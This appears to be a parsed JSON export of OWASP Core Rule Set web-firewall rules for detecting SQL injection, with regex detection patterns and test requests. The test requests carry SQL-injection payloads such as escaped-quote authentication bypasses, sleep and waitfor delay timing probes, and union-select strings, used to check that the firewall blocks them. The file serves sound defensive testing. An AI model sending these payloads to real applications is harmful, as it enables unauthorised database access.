"act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": true, "operator_negated": false, "oplineno": 1526 } }, { "rule_id": null, "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "1", "negated": false } ], "operator": { "type": "@rx", "argument": "^(?:and|or)$", "negated": false } }, "transformations": [ "none" ], "metadata": {}, "attack_info": { "type": [], "severity": null, "tags": [] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 1546, "variables": [ { "variable": "TX", "variable_part": "1", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "^(?:and|or)$", "actions": [ { "act_name": "t", "lineno": 1547, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1548, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1549, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 1546 } }, { "rule_id": "942522", "has_tests": true, "detection": { "variables": [ { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "^.*?\\x5c['\\\"`](?:.*?['\\\"`])?\\s*(?:and|or)\\b", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "Detects basic SQL authentication bypass attempts 4.1/4", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/2", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "Blocks bypass with escaped quotes", "test_id": 1, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=%5C'or'1" }, "expected": { "should_block": true, "rule_ids": [ 942522 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=%5C'or'1" } ] }, { "description": "Blocks bypass with escaped quotes", "test_id": 2, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=%5C%22or%221" }, "expected": { "should_block": true, "rule_ids": [ 942522 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=%5C%22or%221" } ] }, { "description": "Blocks bypass with escaped quotes", "test_id": 3, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=%5C%60or%601" }, "expected": { "should_block": true, "rule_ids": [ 942522 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=%5C%60or%601" } ] }, { "description": "Blocks bypass with: \\'and", "test_id": 4, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=%5C'and" }, "expected": { "should_block": true, "rule_ids": [ 942522 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=%5C'and" } ] }, { "description": "Negative test: doesn't block normal SQLi", "test_id": 5, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var='or'1" }, "expected": { "should_block": false, "rule_ids": [ 942522 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var='or'1" } ] }, { "description": "Negative test: doesn't block escaped quotes without following (and|or)", "test_id": 6, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=%5C' foo or" }, "expected": { "should_block": false, "rule_ids": [ 942522 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=%5C' foo or" } ] }, { "description": "New line bypass", "test_id": 7, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=newline%0A%5C' and 1" }, "expected": { "should_block": true, "rule_ids": [ 942522 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=newline%0A%5C' and 1" } ] }, { "description": "Negative test: Wikipedia article about SQLi", "test_id": 8, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=Incorrectly%20constructed%20SQL%20statements%0AThis%20form%20of%20injection%20relies%20on%20the%20fact%20that%20SQL%20statements%20consist%20of%20both%20data%20used%20by%20the%20SQL%20statement%20and%20commands%20that%20control%20how%20the%20SQL%20statement%20is%20executed.%20For%20example%2C%20in%20the%20SQL%20statement%20select%20*%20from%20person%20where%20name%20%3D%20'susan'%20and%20age%20%3D%202%20the%20string%20'susan'%20is%20data%20and%20the%20fragment%20and%20age%20%3D%202%20is%20an%20example%20of%20a%20command%20(the%20value%202%20is%20also%20data%20in%20this%20example).%0A%0ASQL%20injection%20occurs%20when%20specially%20crafted%20user%20input%20is%20processed%20by%20the%20receiving%20program%20in%20a%20way%20that%20allows%20the%20input%20to%20exit%20a%20data%20context%20and%20enter%20a%20command%20context.%20This%20allows%20the%20attacker%20to%20alter%20the%20structure%20of%20the%20SQL%20statement%20which%20is%20executed.%0A%0AAs%20a%20simple%20example%2C%20imagine%20that%20the%20data%20'susan'%20in%20the%20above%20statement%20was%20provided%20by%20user%20input.%20The%20user%20entered%20the%20string%20'susan'%20(without%20the%20apostrophes)%20in%20a%20web%20form%20text%20entry%20field%2C%20and%20the%20program%20used%20string%20concatenation%20statements%20to%20form%20the%20above%20SQL%20statement%20from%20the%20three%20fragments%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'susan'%2C%20and%20'%20and%20age%20%3D%202.%0A%0ANow%20imagine%20that%20instead%20of%20entering%20'susan'%20the%20attacker%20entered%20'%20or%201%3D1%3B%20--.%0A%0AThe%20program%20will%20use%20the%20same%20string%20concatenation%20approach%20with%20the%203%20fragments%20of%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'%20or%201%3D1%3B%20--%2C%20and%20'%20and%20age%20%3D%202%20and%20construct%20the%20statement%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20--%20and%20age%20%3D%202.%20Many%20databases%20will%20ignore%20the%20text%20after%20the%20'--'%20string%20as%20this%20denotes%20a%20comment.%20The%20structure%20of%20the%20SQL%20command%20is%20now%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20and%20this%20will%20select%20all%20person%20rows%20rather%20than%20just%20those%20named%20'susan'%20whose%20age%20is%202.%20The%20attacker%20has%20managed%20to%20craft%20a%20data%20string%20which%20exits%20the%20data%20context%20and%20entered%20a%20command%20context.%0A%0AA%20more%20complex%20example%20is%20now%20presented.%0A%0AImagine%20a%20program%20creates%20a%20SQL%20statement%20using%20the%20following%20string%20assignment%20command%20%3A%0A%0Avar%20statement%20%3D%20%22SELECT%20*%20FROM%20users%20WHERE%20name%20%3D%20'%22%20%2B%20userName%20%2B%20%22'%22%3B%0A%0AThis%20SQL%20code%20is%20designed%20to%20pull%20up%20the%20records%20of%20the%20specified%20username%20from%20its%20table%20of%20users.%20However%2C%20if%20the%20%22userName%22%20variable%20is%20crafted%20in%20a%20specific%20way%20by%20a%20malicious%20user%2C%20the%20SQL%20statement%20may%20do%20more%20than%20the%20code%20author%20intended.%20For%20example%2C%20setting%20the%20%22userName%22%20variable%20as%3A%0A%0A'%20OR%20'1'%3D'1%0Aor%20using%20comments%20to%20even%20block%20the%20rest%20of%20the%20query%20(there%20are%20three%20types%20of%20SQL%20comments%5B14%5D).%20All%20three%20lines%20have%20a%20space%20at%20the%20end%3A%0A%0A'%20OR%20'1'%3D'1'%20--%0A'%20OR%20'1'%3D'1'%20%7B%0A'%20OR%20'1'%3D'1'%20%2F*%20" }, "expected": { "should_block": false, "rule_ids": [ 942522 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=Incorrectly%20constructed%20SQL%20statements%0AThis%20form%20of%20injection%20relies%20on%20the%20fact%20that%20SQL%20statements%20consist%20of%20both%20data%20used%20by%20the%20SQL%20statement%20and%20commands%20that%20control%20how%20the%20SQL%20statement%20is%20executed.%20For%20example%2C%20in%20the%20SQL%20statement%20select%20*%20from%20person%20where%20name%20%3D%20'susan'%20and%20age%20%3D%202%20the%20string%20'susan'%20is%20data%20and%20the%20fragment%20and%20age%20%3D%202%20is%20an%20example%20of%20a%20command%20(the%20value%202%20is%20also%20data%20in%20this%20example).%0A%0ASQL%20injection%20occurs%20when%20specially%20crafted%20user%20input%20is%20processed%20by%20the%20receiving%20program%20in%20a%20way%20that%20allows%20the%20input%20to%20exit%20a%20data%20context%20and%20enter%20a%20command%20context.%20This%20allows%20the%20attacker%20to%20alter%20the%20structure%20of%20the%20SQL%20statement%20which%20is%20executed.%0A%0AAs%20a%20simple%20example%2C%20imagine%20that%20the%20data%20'susan'%20in%20the%20above%20statement%20was%20provided%20by%20user%20input.%20The%20user%20entered%20the%20string%20'susan'%20(without%20the%20apostrophes)%20in%20a%20web%20form%20text%20entry%20field%2C%20and%20the%20program%20used%20string%20concatenation%20statements%20to%20form%20the%20above%20SQL%20statement%20from%20the%20three%20fragments%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'susan'%2C%20and%20'%20and%20age%20%3D%202.%0A%0ANow%20imagine%20that%20instead%20of%20entering%20'susan'%20the%20attacker%20entered%20'%20or%201%3D1%3B%20--.%0A%0AThe%20program%20will%20use%20the%20same%20string%20concatenation%20approach%20with%20the%203%20fragments%20of%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'%20or%201%3D1%3B%20--%2C%20and%20'%20and%20age%20%3D%202%20and%20construct%20the%20statement%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20--%20and%20age%20%3D%202.%20Many%20databases%20will%20ignore%20the%20text%20after%20the%20'--'%20string%20as%20this%20denotes%20a%20comment.%20The%20structure%20of%20the%20SQL%20command%20is%20now%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20and%20this%20will%20select%20all%20person%20rows%20rather%20than%20just%20those%20named%20'susan'%20whose%20age%20is%202.%20The%20attacker%20has%20managed%20to%20craft%20a%20data%20string%20which%20exits%20the%20data%20context%20and%20entered%20a%20command%20context.%0A%0AA%20more%20complex%20example%20is%20now%20presented.%0A%0AImagine%20a%20program%20creates%20a%20SQL%20statement%20using%20the%20following%20string%20assignment%20command%20%3A%0A%0Avar%20statement%20%3D%20%22SELECT%20*%20FROM%20users%20WHERE%20name%20%3D%20'%22%20%2B%20userName%20%2B%20%22'%22%3B%0A%0AThis%20SQL%20code%20is%20designed%20to%20pull%20up%20the%20records%20of%20the%20specified%20username%20from%20its%20table%20of%20users.%20However%2C%20if%20the%20%22userName%22%20variable%20is%20crafted%20in%20a%20specific%20way%20by%20a%20malicious%20user%2C%20the%20SQL%20statement%20may%20do%20more%20than%20the%20code%20author%20intended.%20For%20example%2C%20setting%20the%20%22userName%22%20variable%20as%3A%0A%0A'%20OR%20'1'%3D'1%0Aor%20using%20comments%20to%20even%20block%20the%20rest%20of%20the%20query%20(there%20are%20three%20types%20of%20SQL%20comments%5B14%5D).%20All%20three%20lines%20have%20a%20space%20at%20the%20end%3A%0A%0A'%20OR%20'1'%3D'1'%20--%0A'%20OR%20'1'%3D'1'%20%7B%0A'%20OR%20'1'%3D'1'%20%2F*%20" } ] }, { "description": "Detect admin%40juice-sh.op'and%20likely%20(id)--", "test_id": 9, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "admin%2540juice-sh.op%5C%27and%2520likely%2520%28id%29--" }, "expected": { "should_block": true, "rule_ids": [ 942522 ] }, "malicious_patterns": [ { "location": "post_body", "value": "admin%2540juice-sh.op%5C%27and%2520likely%2520%28id%29--" } ] }, { "description": "Integration test: 942522 blocks foo\\''or'oof", "test_id": 10, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=foo%5c''or'oof" }, "expected": { "should_block": true, "rule_ids": [ 942522 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=foo%5c''or'oof" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 1554, "variables": [ { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "^.*?\\x5c['\\\"`](?:.*?['\\\"`])?\\s*(?:and|or)\\b", "actions": [ { "act_name": "id", "lineno": 1555, "act_quote": "no_quote", "act_arg": "942522", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 1556, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 1557, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 1558, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1559, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1559, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 1560, "act_quote": "quotes", "act_arg": "Detects basic SQL authentication bypass attempts 4.1/4", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 1561, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1562, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1563, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1564, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1565, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1566, "act_quote": "quotes", "act_arg": "paranoia-level/2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1567, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1568, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1569, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 1570, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 1571, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1572, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1573, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 1554 } }, { "rule_id": "942101", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_BASENAME", "part": "", "negated": false }, { "name": "REQUEST_FILENAME", "part": "", "negated": false } ], "operator": { "type": "@detectSQLi", "argument": "", "negated": false } }, "transformations": [ "none", "utf8toUnicode", "urlDecodeUni", "removeNulls" ], "metadata": { "phase": "1", "message": "SQL Injection Attack Detected via libinjection", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/2", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "Simple SQL Injection", "test_id": 1, "request": { "method": "POST", "uri": "/post/1234%20OR%201=1", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942101 ] }, "malicious_patterns": [] }, { "description": "Basic SQL injection", "test_id": 2, "request": { "method": "POST", "uri": "/post/2010-01-01'+sleep(20.to_i)+'", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942101 ] }, "malicious_patterns": [] }, { "description": "Simple SQL injection", "test_id": 3, "request": { "method": "POST", "uri": "/post/EmptyValue'%20and%20526=527", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942101 ] }, "malicious_patterns": [] }, { "description": "Advanced SQL injection", "test_id": 4, "request": { "method": "POST", "uri": "/post/foo')waitfor%20delay'5%3a0%3a20'--", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942101 ] }, "malicious_patterns": [] }, { "description": "Simple function call", "test_id": 5, "request": { "method": "POST", "uri": "/post/sleep(20)", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942101 ] }, "malicious_patterns": [] }, { "description": "Advanced SQL injection", "test_id": 6, "request": { "method": "POST", "uri": "/post/unittests@coreruleset.org\"%20sleep(10.to_i)%20\"", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942101 ] }, "malicious_patterns": [] }, { "description": "SQL Injection at the last segment of the path (request_basename detection)", "test_id": 7, "request": { "method": "POST", "uri": "/post/foo/24'union+all+select+1,2,3+from+aa", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942101 ] }, "malicious_patterns": [] }, { "description": "SQL Injection inside the path (request_filename detection)", "test_id": 8, "request": { "method": "POST", "uri": "/post/foo/24'union+all+select+1,2,3+from+aa/bar", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942101 ] }, "malicious_patterns": [] }, { "description": "SQL Injection inside the path with comment block (request_filename detection)", "test_id": 9, "request": { "method": "POST", "uri": "/post/%2A/%2A/2+union+all/bar", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942101 ] }, "malicious_patterns": [] }, { "description": "Negative test with incomplete SQL command inside the path", "test_id": 10, "request": { "method": "POST", "uri": "/post/foo/9'union+all/bar", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 942101 ] }, "malicious_patterns": [] }, { "description": "Negative test with complete SQL command inside the path, but without comma", "test_id": 11, "request": { "method": "POST", "uri": "/post/foo/24+union+all+select+1,2,3+from+aa/bar", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 942101 ] }, "malicious_patterns": [] } ], "raw_rule": { "type": "SecRule", "lineno": 1592, "variables": [ { "variable": "REQUEST_BASENAME", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_FILENAME", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@detectSQLi", "operator_argument": "", "actions": [ { "act_name": "id", "lineno": 1593, "act_quote": "no_quote", "act_arg": "942101", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 1594, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 1595, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 1596, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1597, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1597, "act_quote": "no_quote", "act_arg": "utf8toUnicode", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1597, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1597, "act_quote": "no_quote", "act_arg": "removeNulls", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 1598, "act_quote": "quotes", "act_arg": "SQL Injection Attack Detected via libinjection", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 1599, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1600, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1601, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1602, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1603, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1604, "act_quote": "quotes", "act_arg": "paranoia-level/2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1605, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1606, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1607, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 1608, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 1609, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1610, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1611, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 1592 } }, { "rule_id": "942152", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_HEADERS", "part": "Referer", "negated": false }, { "name": "REQUEST_HEADERS", "part": "User-Agent", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)\\b(?:a(?:dd(?:dat|tim)e|es_(?:de|en)crypt|s(?:cii(?:str)?|in)|tan2?)|b(?:enchmark|i(?:n_to_num|t_(?:and|count|length|x?or)))|c(?:har(?:acter)?_length|eil(?:ing)?|o(?:alesce|ercibility|llation|(?:mpres)?s|n(?:cat(?:_ws)?|nection_id|v(?:ert(?:_tz)?)?)|t)|rc32|ur(?:(?:dat|tim)e|rent_(?:date|setting|time(?:stamp)?|user)))|d(?:a(?:t(?:abase(?:_to_xml)?|e(?:_(?:add|format|sub)|diff))|y(?:name|of(?:month|week|year)))|count|e(?:code|grees|s_(?:de|en)crypt)|ump)|e(?:lt|n(?:c(?:ode|rypt)|ds_?with)|x(?:p(?:ort_set)?|tract(?:value)?))|f(?:i(?:el|n)d_in_set|ound_rows|rom_(?:base64|days|unixtime))|g(?:e(?:ometrycollection|t(?:_(?:format|lock)|pgusername))|(?:r(?:eates|oup_conca)|tid_subse)t)|hex(?:toraw)?|i(?:fnull|n(?:et6?_(?:aton|ntoa)|s(?:ert|tr)|terval)|s(?:_(?:(?:free|used)_lock|ipv(?:4(?:_(?:compat|mapped))?|6)|n(?:ot(?:_null)?|ull)|superuser)|null))|json(?:_(?:a(?:gg|rray(?:_(?:elements(?:_text)?|length))?)|build_(?:array|object)|e(?:ac|xtract_pat)h(?:_text)?|object(?:_(?:agg|keys))?|populate_record(?:set)?|strip_nulls|t(?:o_record(?:set)?|ypeof))|b(?:_(?:array(?:_(?:elements(?:_text)?|length))?|build_(?:array|object)|object(?:_(?:agg|keys))?|e(?:ac|xtract_pat)h(?:_text)?|insert|p(?:ath_(?:(?:exists|match)(?:_tz)?|query(?:_(?:(?:array|first)(?:_tz)?|tz))?)|opulate_record(?:set)?|retty)|s(?:et(?:_lax)?|trip_nulls)|t(?:o_record(?:set)?|ypeof)))?|path)?|l(?:ast_(?:day|insert_id)|case|e(?:as|f)t|i(?:kel(?:ihood|y)|nestring)|o(?:_(?:from_bytea|put)|ad_file|ca(?:ltimestamp|te)|g(?:10|2)|wer)|pad|trim)|m(?:a(?:ke(?:_set|date)|ster_pos_wait)|d5|